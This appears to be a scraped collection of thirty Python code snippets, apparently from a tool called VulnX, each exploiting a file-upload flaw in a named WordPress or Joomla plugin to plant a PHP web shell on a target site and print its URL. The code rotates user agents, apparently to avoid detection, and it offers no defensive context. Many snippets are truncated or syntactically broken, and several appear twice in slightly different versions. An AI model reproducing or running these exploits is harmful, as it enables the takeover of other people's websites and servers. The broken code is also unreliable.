Example #1
def wp_showbiz(url, headers, timeout, vulnresults):
    endpoint = url + "/wp-admin/admin-ajax.php"

    #method to randomize the user agent [functionINfunction]
    def random_UserAgent():
        useragents_rotate = [
            "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0",
            "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0",
            "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
            "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
            "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31"
        useragents_random = random.choice(useragents_rotate)
        return useragents_random

    useragent = random_UserAgent()
    headers['User-Agent'] = useragent
    headers['Content_Type'] = 'multipart/form-data'
    options = {
        "action": "showbiz_ajax_action",
        "client_action": "update_plugin",
        "update_file": [open('./shell/VulnX.php', 'rb')]
    send_shell = vxpost(endpoint, options, headers, timeout)
    dump_data = url + "/wp-content/plugins/showbiz/temp/update_extract/VulnX.php?Vuln=X"
    res = vxget(dump_data, options)
    check_showbiz = re.findall("Vuln X", res)
    if check_showbiz:
        print(' %s Showbiz Pro           %s    %s' %
              (que, vulnexploit, dump_data))
        vulnresults.add('[SUCCESS] Showbiz Pro -- Shell:' + dump_data)
        print(' %s Showbiz Pro           %s' % (que, failexploit))
        vulnresults.add('[FAILED] Showbiz Pro')
Example #2
def joomla_foxcontact(url, headers, timeout):
        'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'

    #    foxf = {'components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../_func.php',
    #            'index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php',
    #            'index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php',
    #            'components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php'}

    endpoint = url + "/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"

    headers = {"content-type": ["form-data"]}
    fieldname = 'file'
    shell = open('./shell/VulnX.txt', 'rb')
    data = {
        fieldname: shell,
    content = vxpost(endpoint, data, headers, timeout)
    path_shell = endpoint + "/images/XAttacker.txt"
    response = vxget(path_shell, headers, timeout)
    if re.findall(r'Tig', response):
        print(' %s Fox Contact            %s    %s' %
              (que, vulnexploit, path_shell))
        print(' %s fox Contact            %s' % (que, failexploit))
Example #3
def wp_wysija(url, headers, timeout, vulnresults):
    theme = "my-theme"
    endpoint = url + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes"
    shell = open('./shell/VulnX.php', 'rb')

    field = "wpshop_file"
        'User-Agent'] = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
    headers['Content_Type'] = 'form-data'
    options = {
        'theme': shell,
        'overwriteexistingtheme': 'on',
        'action': 'themeupload',
        'submitter': 'Upload'
    send_shell = vxpost(endpoint, options, headers, timeout)
    dump_data = url + "/wp-content/uploads/wysija/themes/VulnX/VulnX.php?Vuln=X"
    res = vxget(dump_data, headers, timeout)
    check_wysija = re.findall("Vuln X", res)
    if check_wysija:
        print(' %s Wysija Newsletters    %s    %s' %
              (que, vulnexploit, dump_data))
        vulnresults.add('[SUCCESS] Wysija Newsletters -- Shell:' + dump_data)
        print(' %s Wysija Newsletters    %s' % (que, failexploit))
        vulnresults.add('[FAILED] Wysija Newsletters')
Example #4
def wp_wysija(url, headers):
    theme = "my-theme"
    endpoint = url + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes"
    shell = open('./shell/VulnX.php', 'rb')

    field = "wpshop_file"
        'User-Agent'] = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
    headers['Content_Type'] = 'form-data'
    options = {
        'theme': shell,
        'overwriteexistingtheme': 'on',
        'action': 'themeupload',
        'submitter': 'Upload'
    send_shell = vxpost(endpoint, options, headers, 3)
    dump_data = url + "/wp-content/uploads/wysija/themes/VulnX/VulnX.php?Vuln=X"
    res = vxget(dump_data, headers, 3)
    check_wysija = re.findall("Vuln X", res)
    if check_wysija:
        print('%s [%s+%s] Wysija Newsletters%s -------------- %s VULN%s' %
              (W, G, W, W, G, W))
        print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' %
              (G, W, B, W, dump_data, W))
        print('%s [%s-%s] Wysija Newsletters%s -------------- %s FAIL%s' %
              (W, R, W, W, R, W))
Example #5
def joomla_comjdownloads(url, headers, timeout):
        'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
    endpoint = url + "index.php?option=com_jdownloads&Itemid=0&view=upload"
    headers = {"content-type": ["form-data"]}
    files = open('./shell/VulnX.zip', 'rb')
    shell = open('./shell/VulnX.gif', 'rb')
    data = {
        'name': 'Tig',
        'mail': '*****@*****.**',
        'filetitle': 'Tig',
        'catlist': '1',
        'license': '0',
        'language': '0',
        'system': '0',
        'file_upload': files,
        'pic_upload': shell,
        'description': '<p>zot</p>',
        'senden': 'Send file',
        'option': 'com_jdownloads',
        'view': 'upload',
        'send': '1',
        '24c22896d6fe6977b731543b3e44c22f': '1'
    content = vxpost(endpoint, data, headers, timeout)
    path_shell = endpoint + "/images/jdownloads/screenshots/VulnX.gif?Vuln=X"
    response = vxget(path_shell, headers, timeout)
    if re.findall(r'Vuln X', response):
        print(' %s Com Jdownloads        %s    %s' %
              (que, vulnexploit, path_shell))
        print(' %s Com Jdownloads        %s' % (que, failexploit))
Example #6
def wp_dm(url, headers, timeout, vulnresults):
    headers['Content_Type']: 'multipart/form-data'
    options = {'upfile': open('./shell/VulnX.php', 'rb'), 'dm_upload': ''}
    send_shell = vxpost(url, options, headers, timeout)
    dump_data = url + "/wp-content/plugins/downloads-manager/upload/VulnX.php?Vuln=X"
    content = vxget(dump_data, headers, timeout)
    check_dm = re.findall("Vuln X", content)
    if check_dm:
        print(' %s Download Manager      %s    %s' %
              (que, vulnexploit, dump_data))
        vulnresults.add('[SUCCESS] Download Manager -- Shell:' + dump_data)
        print(' %s Download Manager      %s' % (que, failexploit))
        vulnresults.add('[FAILED] Download Manager')
Example #7
def wp_dm(url, headers):
    headers['Content_Type']: 'multipart/form-data'
    options = {'upfile': open('./shell/VulnX.php', 'rb'), 'dm_upload': ''}
    send_shell = vxpost(url, options, headers, 3)
    dump_data = url + "/wp-content/plugins/downloads-manager/upload/VulnX.php?Vuln=X"
    content = vxget(dump_data, headers, 3)
    check_dm = re.findall("Vuln X", content)
    if check_dm:
        print('%s [%s+%s] Download Manager %s---- %s VULN%s' %
              (W, G, W, W, G, W))
        print('%s [*] Injected Successfully \n %s%s[*] Found ->%s %s %s' %
              (G, W, B, W, dump_data, W))
        print('%s [%s-%s] Download Manager %s --- %s FAIL%s' %
              (W, R, W, W, R, W))
Example #8
def wp_cherry(url, headers, timeout, vulnresults):
    headers['Content_Type']: 'multipart/form-data'
    options = {'file': open('./shell/VulnX.php', 'rb')}
    endpoint = url + "/wp-content/plugins/cherry-plugin/admin/import-export/upload.php"
    response = vxpost(endpoint, options, headers, timeout)
    dump_data = url + "/wp-content/plugins/cherry-plugin/admin/import-export/VulnX.php?Vuln=X"
    content = vxget(dump_data, headers, timeout)
    check_cherry = re.findall("Vuln X", content)
    if check_cherry:
        print(' %s CherryFramework       %s    %s' %
              (que, vulnexploit, dump_data))
        vulnresults.add('[SUCCESS] CherryFramework -- Shell:' + dump_data)
        print(' %s CherryFramework       %s' % (que, failexploit))
        vulnresults.add('[FAILED] CherryFramework')
Example #9
def wp_adblockblocker(url,headers,timeout,vulnresults):
    endpoint = url + "/wp-admin/admin-ajax.php?action=getcountryuser&cs=2"
    shell = open('./shell/VulnX.php','rb')
    headers['Content_Type'] = 'multipart/form-data'
    options = {
    send_shell = vxpost(endpoint,options,headers,timeout)
    dump_data = url + "/wp-content/uploads/"+year+"/"+month+"/VulnX.php?Vuln=X"
    res=vxget(dump_data, headers,timeout)
    if re.findall("Vuln X", res):
        print (' %s adblockblocker        %s    %s' %(que,vulnexploit,dump_data))
        vulnresults.add('[SUCCESS] adblockblocker -- Shell:' + dump_data)
        print (' %s adblockblocker        %s' %(que , failexploit))       
        vulnresults.add('[FAILED] adblockblocker')
Example #10
def wp_cherry(url, headers):
    headers['Content_Type']: 'multipart/form-data'
    options = {'file': open('./shell/VulnX.php', 'rb')}
    endpoint = url + "/wp-content/plugins/cherry-plugin/admin/import-export/upload.php"
    response = vxpost(endpoint, options, headers, 3)
    dump_data = url + "/wp-content/plugins/cherry-plugin/admin/import-export/VulnX.php?Vuln=X"
    content = vxget(dump_data, headers, 3)
    check_cherry = re.findall("Vuln X", content)
    if check_cherry:
        print('%s [%s+%s] CherryFramework%s ------------- %s VULN%s' %
              (W, G, W, W, G, W))
        print('%s [*]Shell Uploaded Successfully \n %s link : %s%s ' %
              (B, W, dump_data, W))
        print('%s [%s-%s] CherryFramework%s ------------- %s FAIL%s' %
              (W, R, W, W, R, W))
Example #11
def wp_fromcraft(url, headers, timeout, vulnresults):
    shell = open('./shell/VulnX.php', 'rb')
    fields = "files[]"
    headers['Content_Type'] = 'multipart/form-data'
    options = {fields: shell}
    endpoint = url + "/wp-content/plugins/formcraft/file-upload/server/php/"
    response = vxpost(endpoint, options, headers, timeout)
    dump_data = url + "/wp-content/plugins/formcraft/file-upload/server/php/files/VulnX.php?Vuln=X"
    check_fromcraft = re.findall("\"files", response)
    if check_fromcraft:
        print(' %s Formcraft             %s    %s' %
              (que, vulnexploit, dump_data))
        vulnresults.add('[SUCCESS] Formcraft -- Shell:' + dump_data)
        print(' %s Formcraft             %s' % (que, failexploit))
        vulnresults.add('[FAILED] Formcraft')
Example #12
def wp_fromcraft(url, headers):
    shell = open('./shell/VulnX.php', 'rb')
    fields = "files[]"
    headers['Content_Type'] = 'multipart/form-data'
    options = {fields: shell}
    endpoint = url + "/wp-content/plugins/formcraft/file-upload/server/php/"
    response = vxpost(endpoint, options, headers, 3)
    dump_data = url + "/wp-content/plugins/formcraft/file-upload/server/php/files/VulnX.php?Vuln=X"
    check_fromcraft = re.findall("\"files", response)
    if check_fromcraft:
        print('%s [%s+%s] Formcraft %s ---------- %s VULN%s' %
              (W, G, W, W, G, W))
        print('%s [*] Injected Successfully \n %s%s[*] Found ->%s %s %s' %
              (G, W, B, W, dump_data, W))
        print('%s [%s-%s] Formcraft %s ---------- %s FAIL%s' %
              (W, R, W, W, R, W))
Example #13
def wp_shop(url, headers, timeout, vulnresults):
    endpoint = url + "/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload"
    shell = open('./shell/VulnX.php', 'rb')
    field = "wpshop_file"
    headers['Content_Type'] = 'multipart/form-data'
    options = {field: shell}
    send_shell = vxpost(endpoint, options, headers, timeout)
    dump_data = url + "/wp-content/uploads/VulnX.php?Vuln=X"
    res = vxget(dump_data, headers, timeout)
    check_shop = re.findall("Vuln X", res)
    if check_shop:
        print(' %s WPshop eCommerce      %s    %s' %
              (que, vulnexploit, dump_data))
        vulnresults.add('[SUCCESS] WPshop eCommerce -- Shell:' + dump_data)
        print(' %s WPshop eCommerce      %s' % (que, failexploit))
        vulnresults.add('[FAILED] WPshop eCommerce')
Example #14
def wp_inboundiomarketing(url,headers,timeout,vulnresults):
    endpoint = url + "/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php"
    shell = open('./shell/VulnX.php','rb')
    headers['Content_Type'] = 'multipart/form-data'
    options = {
    send_shell = vxpost(endpoint,options,headers,timeout)
    dump_data = url + "/wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/VulnX.php?Vuln=X"
    res=vxget(dump_data, headers,timeout)
    check_wysija = re.findall("Vuln X", res)
    if check_wysija:
        print (' %s InBoundio Marketing   %s    %s' %(que,vulnexploit,dump_data))
        vulnresults.add('[SUCCESS] InBoundio Marketing -- Shell:' + dump_data)
        print (' %s InBoundio Marketing   %s' %(que , failexploit))       
        vulnresults.add('[FAILED] InBoundio Marketing')
Example #15
def wp_adsmanager(url, headers, timeout, vulnresults):
    endpoint = url + "/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php"
    shell = open('./shell/VulnX.php', 'rb')
    field = "wpshop_file"
    headers['Content_Type'] = 'multipart/form-data'
    options = {'uploadfile': shell, 'action': 'upload_ad_image', 'path': ''}
    send_shell = vxpost(endpoint, options, headers, timeout)
    dump_data = url + "/wp-content/plugins/simple-ads-manager/VulnX.php?Vuln=X/"
    res = vxget(dump_data, headers, timeout)
    check_adsmanager = re.findall("{\"status\":\"success\"}", res)
    if check_adsmanager:
        print(' %s Simple Ads Manager    %s    %s' %
              (que, vulnexploit, dump_data))
        vulnresults.add('[SUCCESS] Simple Ads Manager -- Shell:' + dump_data)
        print(' %s Simple Ads Manager    %s' % (que, failexploit))
        vulnresults.add('[FAILED] Simple Ads Manager')
Example #16
def wp_adsmanager(url, headers):
    endpoint = url + "/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php"
    shell = open('./shell/VulnX.php', 'rb')
    field = "wpshop_file"
    headers['Content_Type'] = 'multipart/form-data'
    options = {'uploadfile': shell, 'action': 'upload_ad_image', 'path': ''}
    send_shell = vxpost(endpoint, options, headers, 3)
    dump_data = url + "/wp-content/plugins/simple-ads-manager/VulnX.php?Vuln=X/"
    res = vxget(dump_data, headers, 3)
    check_adsmanager = re.findall("{\"status\":\"success\"}", res)
    if check_adsmanager:
        print('%s [%s+%s] Simple Ads Manager%s -------- %s VULN%s' %
              (W, G, W, W, G, W))
        print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' %
              (G, W, B, W, dump_data, W))
        print('%s [%s-%s] Simple Ads Manager%s -------- %s FAIL%s' %
              (W, R, W, W, R, W))
Example #17
def wp_shop(url, headers):
    endpoint = url + "/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload"
    shell = open('./shell/VulnX.php', 'rb')
    field = "wpshop_file"
    headers['Content_Type'] = 'multipart/form-data'
    options = {field: shell}
    send_shell = vxpost(endpoint, options, headers, 3)
    dump_data = url + "/wp-content/uploads/VulnX.php?Vuln=X"
    res = vxget(dump_data, headers, 3)
    check_shop = re.findall("Vuln X", res)
    if check_shop:
        print('%s [%s+%s] WPshop eCommerce%s ------------- %s VULN%s' %
              (W, G, W, W, G, W))
        print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' %
              (G, W, B, W, dump_data, W))
        print('%s [%s-%s] WPshop eCommerce%s ------------- %s FAIL%s' %
              (W, R, W, W, R, W))
Example #18
def wp_adblockblocker(url, headers):
    endpoint = url + "/wp-admin/admin-ajax.php?action=getcountryuser&cs=2"
    shell = open('./shell/VulnX.php', 'rb')
    headers['Content_Type'] = 'multipart/form-data'
    options = {
        'popimg': shell,
    send_shell = vxpost(endpoint, options, headers, 3)
    dump_data = url + "/wp-content/uploads/" + year + "/" + month + "/VulnX.php?Vuln=X"
    res = vxget(dump_data, headers, 3)
    if re.findall("Vuln X", res):
        print('%s [%s+%s] adblockblocker%s ------- %s VULN%s' %
              (W, G, W, W, G, W))
        print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' %
              (G, W, B, W, dump_data, W))
        print('%s [%s-%s] adblockblocker%s ------- %s FAIL%s' %
              (W, R, W, W, R, W))
Example #19
def joomla_fabrik2_d(url, headers, timeout):
        'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
    endpoint = url + "/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"

    headers = {"content-type": ["form-data"]}
    fieldname = 'file'
    shell = open('./shell/VulnX.txt', 'rb')
    data = {
        fieldname: shell,
    content = vxpost(endpoint, data, headers, timeout)
    path_shell = endpoint + "/images/XAttacker.txt"
    response = vxget(path_shell, headers, timeout)
    if re.findall(r'Tig', response):
        print(' %s Com Fabrik2            %s    %s' %
              (que, vulnexploit, path_shell))
        print(' %s Com Fabrik2            %s' % (que, failexploit))
Example #20
def wp_levoslideshow(url,headers,timeout,vulnresults):
    endpoint = url + "/wp-admin/admin.php?page=levoslideshow_manage"
    shell = open('./shell/VulnX.php','rb')
    headers['Content_Type'] = 'multipart/form-data'
    options = {
            'task' : 'lvo_add_new_album',
            'album_name': '',
            'album_desk': '',
    send_shell = vxpost(endpoint,options,headers,timeout)
    check = re.findall("/uploads/levoslideshow/(.*?)/big/VulnX.php/", send_shell)
    if check:
        dump_data = url + "/wp-content/uploads/levoslideshow/"+check.group(1)+"/big/VulnX.php?Vuln=X"
        print (' %s levoslideshow         %s    %s' %(que,vulnexploit,dump_data))
        vulnresults.add('[SUCCESS] levoslideshow -- Shell:' + dump_data)
        print (' %s levoslideshow         %s' %(que , failexploit))       
        vulnresults.add('[FAILED] levoslideshow')
Example #21
def wp_powerzoomer(url,headers,timeout,vulnresults):
    endpoint = url + "/wp-admin/admin.php?page=powerzoomer_manage"
    headers['Content_Type'] = 'multipart/form-data'
    options = {
    response = vxpost(endpoint,options,headers,timeout)
    check_powerzoomer = re.findall("\/uploads\/powerzoomer\/(.*?)\/big\/VulnX.php", response)
    if check_powerzoomer:
        uploadfolder = check_powerzoomer.group(1)
        dump_data = url + "/wp-content/uploads/powerzoomer/"+uploadfolder+"/big/VulnX.php?Vuln=X"
        print (' %s Powerzoomer           %s    %s' %(que,vulnexploit,dump_data))
        vulnresults.add('[SUCCESS] Powerzoomer -- Shell:' + dump_data)
        print (' %s Powerzoomer           %s' %(que , failexploit))       
        vulnresults.add('[FAILED] Powerzoomer')
Example #22
def joomla_comedia(url, headers, timeout):
        'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
    endpoint = url + "/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder="

    headers = {"content-type": ["form-data"]}
    fieldname = 'Filedata[]'
    shell = open('./shell/VulnX.txt', 'rb')
    data = {
        fieldname: shell,
    content = vxpost(endpoint, data, headers, timeout)
    path_shell = endpoint + "/images/XAttacker.txt"
    response = vxget(path_shell, headers, timeout)
    if re.findall(r'Tig', response):
        print(' %s Com Media             %s    %s' %
              (que, vulnexploit, path_shell))
        print(' %s Com Media             %s' % (que, failexploit))
Example #23
def wp_synoptic(url, headers, timeout, vulnresults):
    endpoint = url + "/wp-content/themes/synoptic/lib/avatarupload/upload.php"
    #shell directory
    shell = open('./shell/VulnX.php', 'rb')
    field = "qqfile"
    headers['Content_Type'] = 'multipart/form-data'
    options = {field: shell}
    send_shell = vxpost(endpoint, options, headers, timeout)
    dump_data = url + "/wp-content/uploads/markets/avatars/VulnX.php?Vuln=X"
    res = vxget(dump_data, headers, timeout)
    check_synoptic = re.findall("Vuln X", res)

    if check_synoptic:
        print(' %s Synoptic              %s    %s' %
              (que, vulnexploit, dump_data))
        vulnresults.add('[SUCCESS] Synoptic -- Shell:' + dump_data)
        print(' %s Synoptic              %s' % (que, failexploit))
        vulnresults.add('[FAILED] Synoptic')
Example #24
def wp_catpro(url,headers,timeout,vulnresults):
    options = {
    endpoint = url + "/wp-admin/admin.php?page=catpro_manage"
    content = vxpost(endpoint,options,headers,timeout)
    check_catpro = re.findall("\/uploads\/blaze\/(.*?)\/big\/VulnX.php", content)
    if check_catpro:
        uploadfolder = check_catpro.group(1)
        dump_data = url + "/wp-content/uploads/catpro/"+uploadfolder+"/big/VulnX.php?Vuln=X"
        print (' %s Catpro Plugin         %s    %s' %(que,vulnexploit,dump_data))
        vulnresults.add('[SUCCESS] Catpro -- Shell:' + dump_data)
        print (' %s Catpro Plugin         %s' %(que , failexploit))        
        vulnresults.add('[FAILED] Catpro')
Example #25
def wp_inboundiomarketing(url, headers):
    endpoint = url + "/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php"
    shell = open('./shell/VulnX.php', 'rb')
    headers['Content_Type'] = 'multipart/form-data'
    options = {
        'file': shell,
    send_shell = vxpost(endpoint, options, headers, 3)
    dump_data = url + "/wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/VulnX.php?Vuln=X"
    res = vxget(dump_data, headers, 3)
    check_wysija = re.findall("Vuln X", res)
    if check_wysija:
        print('%s [%s+%s] InBoundio Marketing%s ------- %s VULN%s' %
              (W, G, W, W, G, W))
        print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' %
              (G, W, B, W, dump_data, W))
        print('%s [%s-%s] InBoundio Marketing%s ------- %s FAIL%s' %
              (W, R, W, W, R, W))
Example #26
def wp_synoptic(url, headers):
    endpoint = url + "/wp-content/themes/synoptic/lib/avatarupload/upload.php"
    #shell directory
    shell = open('./shell/VulnX.php', 'rb')
    field = "qqfile"
    headers['Content_Type'] = 'multipart/form-data'
    options = {field: shell}
    send_shell = vxpost(endpoint, options, headers, 3)
    dump_data = url + "/wp-content/uploads/markets/avatars/VulnX.php?Vuln=X"
    res = vxget(dump_data, headers, 3)
    check_synoptic = re.findall("Vuln X", res)

    if check_synoptic:
        print('%s [%s+%s] Synoptic%s ----------- %s VULN%s' %
              (W, G, W, W, G, W))
        print('%s [*] Injected Successfully \n %s%s[*] Found ->%s %s %s' %
              (G, W, B, W, dump_data, W))
        print('%s [%s-%s] Synoptic%s ----------- %s FAIL%s' %
              (W, R, W, W, R, W))
Example #27
def joomla_comjce(url, headers, timeout):
    ip = socket.gethostbyname(hostd(url))
        'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
    endpoint = url + "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20"
    data = {
        'upload-dir': './../../',
        'upload-overwrite': 0,
        'Filedata': [open('./shell/VulnX.gif', 'rb')],
        'action': 'Upload'
    content = vxpost(endpoint, data, headers, timeout)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((url, 80))
    path_shell = url + "/VulnX.gif"
    res = requests.get(path_shell, headers)
    if re.findall(r'/image/gif/', res):
        print(' %s Com Jce               %s    %s' %
              (que, vulnexploit, path_shell))
        print(' %s Com Jce               %s' % (que, failexploit))
Example #28
def wp_blaze(url,headers,timeout,vulnresults):
    #options to send
    options = {
    endpoint = url + "/wp-admin/admin.php?page=blaze_manage"
    #vxpost alias sendrequest method in common folder.
    content = vxpost(endpoint,options,headers,timeout)
    check_blaze = re.findall("\/uploads\/blaze\/(.*?)\/big\/VulnX.php", content)
    if check_blaze:
        uploadfolder = check_blaze.group(1)
        dump_data = url + "/wp-content/uploads/blaze/"+uploadfolder+"/big/VulnX.php?Vuln=X"
        print (' %s Blaze SlideShow       %s    %s' %(que,vulnexploit,dump_data))
        vulnresults.add('[SUCCESS] SlideShow -- Shell:' + dump_data)
        print (' %s Blaze SlideShow       %s' %(que , failexploit))    
        vulnresults.add('[FAILED] SlideShow')
Example #29
def wp_catpro(url, headers):
    headers['Content_Type']: 'multipart/form-data'
    options = {
        'album_img': [open('./shell/VulnX.php', 'rb')],
        'task': 'cpr_add_new_album',
        'album_name': '',
        'album_desc': ''
    endpoint = url + "/wp-admin/admin.php?page=catpro_manage"
    content = vxpost(endpoint, options, headers, 3)
    check_catpro = re.findall("\/uploads\/blaze\/(.*?)\/big\/VulnX.php",
    if check_catpro:
        uploadfolder = check_catpro.group(1)
        dump_data = url + "/wp-content/uploads/catpro/" + uploadfolder + "/big/VulnX.php?Vuln=X"
        print('%s [%s+%s] Catpro Plugin%s ------------- %s VULN%s' %
              (W, G, W, W, G, W))
        print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' %
              (G, W, B, W, dump_data, W))
        print('%s [%s-%s] Catpro Plugin%s ------------- %s FAIL%s' %
              (W, R, W, W, R, W))
Example #30
def wp_powerzoomer(url, headers):
    endpoint = url + "/wp-admin/admin.php?page=powerzoomer_manage"
    headers['Content_Type'] = 'multipart/form-data'
    options = {
        'album_img': [open('./shell/VulnX.php', 'rb')],
        'task': 'pwz_add_new_album',
        'album_name': '',
        'album_desc': ''
    response = vxpost(endpoint, options, headers, 3)
    check_powerzoomer = re.findall(
        "\/uploads\/powerzoomer\/(.*?)\/big\/VulnX.php", response)
    if check_powerzoomer:
        uploadfolder = check_powerzoomer.group(1)
        dump_data = url + "/wp-content/uploads/powerzoomer/" + uploadfolder + "/big/VulnX.php?Vuln=X"
        print('%s [%s+%s] Powerzoomer %s ------- %s VULN%s' %
              (W, G, W, W, G, W))
        print('%s [*] Injected Successfully \n %s%s[*] Found ->%s %s %s' %
              (G, W, B, W, dump_data, W))
        print('%s [%s-%s] Powerzoomer %s ------- %s FAIL%s' %
              (W, R, W, W, R, W))